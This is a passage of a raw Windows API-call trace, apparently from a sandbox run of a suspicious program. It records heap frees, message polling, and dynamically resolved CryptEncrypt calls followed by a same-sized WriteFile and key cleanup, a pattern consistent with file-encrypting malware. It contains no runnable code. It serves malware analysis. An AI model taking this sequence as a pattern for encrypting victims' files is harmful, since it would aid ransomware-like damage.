1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac10b8 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.505] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0208.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaafc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.506] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x9417, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x9418) returned 1 [0208.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.511] CharLowerBuffW (in: lpsz="byte[37912]", cchLength=0xb | out: lpsz="byte[37912]") returned 0xb [0208.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.512] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.512] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.512] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.512] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.512] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.512] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaac60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.513] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ac10b8*, pdwDataLen=0x8cef60*=0x9417, dwBufLen=0x9418 | out: pbData=0x2ac10b8*, pdwDataLen=0x8cef60*=0x9418) returned 1 [0208.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.514] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.514] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.514] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.514] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.515] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.515] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.515] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.515] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.515] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.515] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.515] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.515] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.515] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.515] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.515] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.515] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.515] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.515] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.515] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.522] WriteFile (in: hFile=0x510, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x9418, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x9418, lpOverlapped=0x0) returned 1 [0208.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.523] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.523] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.523] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.523] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.523] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.523] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.524] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.524] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.524] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.524] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaad80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.524] CryptDestroyKey (hKey=0x9e2078) returned 1 [0208.524] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.524] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.524] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.524] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.524] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.524] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.524] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.524] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.524] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.524] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.524] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.524] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.524] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.524] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.524] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.524] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.525] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.525] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.525] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.525] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.525] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.525] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.525] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.525] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.525] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.525] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.525] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.525] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.525] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.525] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.525] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.526] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.526] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.526] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.526] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.526] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.526] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.526] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.526] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.526] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.526] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.526] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.526] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.526] CryptReleaseContext (hProv=0xa7c908, dwFlags=0x0) returned 1 [0208.526] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.526] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.526] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.526] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.526] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.527] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.527] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.527] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.527] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.527] CloseHandle (hObject=0x524) returned 1 [0208.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.529] CloseHandle 